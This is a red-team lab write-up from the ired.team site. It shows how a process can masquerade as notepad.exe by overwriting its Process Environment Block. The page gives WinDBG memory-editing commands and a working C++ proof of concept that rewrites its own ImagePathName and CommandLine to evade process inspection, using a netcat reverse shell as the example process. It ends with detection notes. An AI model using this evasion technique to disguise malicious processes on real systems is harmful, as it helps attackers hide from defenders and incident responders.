Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
AV Bypass with Metasploit Templates and Custom Binaries
Evading Windows Defender with 1 Byte Change
Bypassing Windows Defender: One TCP Socket Away From Meterpreter and Beacon Sessions
Bypassing Cylance and other AVs/EDRs by Unhooking Windows APIs
Windows API Hashing in Malware
Detecting Hooked Syscalls
Calling Syscalls Directly from Visual Studio to Bypass AVs/EDRs
Retrieving ntdll Syscall Stubs from Disk at Run-time
Full DLL Unhooking with C++
Enumerating RWX Protected Memory Regions for Code Injection
Disabling Windows Event Logs by Suspending EventLog Service Threads
Obfuscated Powershell Invocations
Masquerading Processes in Userland via _PEB
Commandline Obfusaction
File Smuggling with HTML and JavaScript
Timestomping
Alternate Data Streams
Hidden Files
Encode/Decode Data with Certutil
Downloading Files with Certutil
Packed Binaries
Unloading Sysmon Driver
Bypassing IDS Signatures with Simple Reverse Shells
Preventing 3rd Party DLLs from Injecting into your Malware
ProcessDynamicCodePolicy: Arbitrary Code Guard (ACG)
Parent Process ID (PPID) Spoofing
Executing C# Assemblies from Jscript and wscript with DotNetToJscript
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Masquerading Processes in Userland via _PEB
Understanding how malicious binaries can maquerade as any other legitimate Windows binary from the userland.

Overview

In this short lab I am going to use a WinDBG to make my malicious program pretend to look like a notepad.exe (hence masquerading) when inspecting system's running processes with tools like Sysinternals ProcExplorer and similar. Note that this is not a code injection exercise.
This is possible, because information about the process, i.e commandline arguments, image location, loaded modules, etc is stored in a memory structure called Process Environment Block (_PEB) that is accessible and writeable from the userland.
Thanks to @FuzzySec who pointed out the following: you don't need SeDebugPrivilege when overwriting the PEB for your own process or generally for overwriting a process spawned in your user context
​https://twitter.com/FuzzySec/status/1090963518558482436​
This lab builds on the previous lab:

Context

For this demo, my malicious binary is going to be an nc.exe - a rudimentary netcat reverse shell spawned by cmd.exe and the PID of 4620:
Using WinDBG, we will make the nc.exe look like notepad.exe. This will be reflected in the Path field and the binary icon in the process properties view using ProcExplorer as seen in the below graphic. Note that it is the same nc.exe process (PID 4620) as shown above, only this time masquerading as a notepad.exe:

Execution

So how is this possible? Read on.
Let's first have a look at the _PEB structure for the nc.exe process using WinDBG:
1
dt _peb @$peb
Copied!
Note that at the offset 0x020 of the PEB, there is another structure which is of interest to us - _RTL_USER_PROCESS_PARAMETERS, which contains nc.exe process information. Let's inspect it further:
1
dt _RTL_USER_PROCESS_PARAMETERS 0x00000000`005e1f60
Copied!
The offset 0x060 of _RTL_USER_PROCESS_PARAMETERS is also of interest to us - it contains a member ImagePathName which points to a structure _UNICODE_STRING that, as we will see later, contains a field Buffer which effectively signifies the name/full path to our malicious binary nc.exe. Note how at the offset 0x70 we can see the commandline arguments of the malicious process, which we explored previously.
Let's inspect the aforementioned _UNICODE_STRING structure:
1
dt _UNICODE_STRING 0x00000000`005e1f60+60
Copied!
_UNICODE_STRING structure describes the lenght of the string and also points to the actual memory location 0x00000000`005e280e by the Buffer field that contains the string which is a full path to our malicious binary.
Let's confirm the string location by dumping the bytes at 0x00000000`005e280e by issuing the following command in WinDBG:
1
0:002> du 0x00000000`005e280e
2
00000000`005e280e "C:\tools\nc.exe"
Copied!
Now that I have confirmed that 0x00000000`005e280e indeed contains the path to the binary, let's try to write a new string to that memory address. Say, let's try swapping the nc.exe with a path to the notepad.exe binary found in Windows\System32\notepad.exe:
1
eu 0x00000000`005e280e "C:\\Windows\\System32\\notepad.exe"
Copied!
If you are following along, do not forget to add NULL byte at the end of your new string to terminate it:
1
eb 0x00000000`005e280e+3d 0x0
Copied!
Let's check the _UNICODE_STRING structure again to see if the changes took effect:
1
dt _UNICODE_STRING 0x00000000`005e1f60+60
Copied!
We can see that our string is getting truncated. This is because the Lenght value in the _UNICODE_STRING structure is set to 0x1e (30 decimal) which equals to only 15 unicode characters:
Let's increase that value to 0x3e to accomodate our longer string pointing to notepad.exe binary and check the structure again:
1
eb 0x00000000`005e1f60+60 3e
2
dt _UNICODE_STRING 0x00000000`005e1f60+60
Copied!
Good, the string pointed to by the field Buffer is no longer getting truncated:
For the sake of this demo, I cleared out the commandline arguments the nc.exe was launched with by amending the _UNICODE_STRING structure member Lenght by setting it to 0:
1
eb 0x00000000`005e1f60+70 0x0
Copied!
Inspecting our malicious nc.exe process again using Process Explorer reveals that it now looks like notepad without commandline arguments:
Note that to further obfuscate the malicious binary, one could also rename the binary itself from nc.exe to notepad.exe.

A simple PoC

As part of this simple lab, I wanted to write a simple C++ proof of concept that would make the running program masquerade itself as a notepad. Here is the code:
pebmasquerade.cpp
1
#include "stdafx.h"
2
#include "Windows.h"
3
#include "winternl.h"
4
​
5
typedef NTSTATUS(*MYPROC) (HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
6
​
7
int main()
8
{
9
HANDLE h = GetCurrentProcess();
10
PROCESS_BASIC_INFORMATION ProcessInformation;
11
ULONG lenght = 0;
12
HINSTANCE ntdll;
13
MYPROC GetProcessInformation;
14
wchar_t commandline[] = L"C:\\windows\\system32\\notepad.exe";
15
ntdll = LoadLibrary(TEXT("Ntdll.dll"));
16
​
17
//resolve address of NtQueryInformationProcess in ntdll.dll
18
GetProcessInformation = (MYPROC)GetProcAddress(ntdll, "NtQueryInformationProcess");
19
​
20
//get _PEB object
21
(GetProcessInformation)(h, ProcessBasicInformation, &ProcessInformation, sizeof(ProcessInformation), &lenght);
22
​
23
//replace commandline and imagepathname
24
ProcessInformation.PebBaseAddress->ProcessParameters->CommandLine.Buffer = commandline;
25
ProcessInformation.PebBaseAddress->ProcessParameters->ImagePathName.Buffer = commandline;
26
​
27
return 0;
28
}
Copied!
pebmasquerade.exe
58KB
Binary
pebmasquerade.exe
..and here is the compiled running program being inspected with ProcExplorer - we can see that the masquerading is achieved successfully:

Observations

Switching back to the nc.exe masquerading as notepad.exe, if we check the !peb data, we can see a notepad.exe is now displayed in the Ldr.InMemoryOrderModuleList memory structure!
NtQueryInformationProcess function (winternl.h) - Win32 apps
docsmsft
Note that even though it shows in the loaded modules that notepad.exe was loaded, it still does not mean that there was an actual notepad.exe process created and sysmon logs prove this, meaning commandline logging can still be helpful in detecting this behaviour.

Credits

​@b33f for his Masquerade-PEB.ps1 which is what originally inspired me (quite some time ago now) to explore this concept, but I never got to lay my hands on it until now. @Mumbai for talking to me about C++ and NtQueryInformationProcess

References

https://docs.microsoft.com/en-us/windows/desktop/api/winternl/ns-winternl-_peb_ldr_data
docs.microsoft.com
NtQueryInformationProcess function (winternl.h) - Win32 apps
docsmsft
Previous
Obfuscated Powershell Invocations
Next
Commandline Obfusaction
Last modified 2yr ago
Copy link
Contents
Overview
Context
Execution
A simple PoC
Observations
Credits
References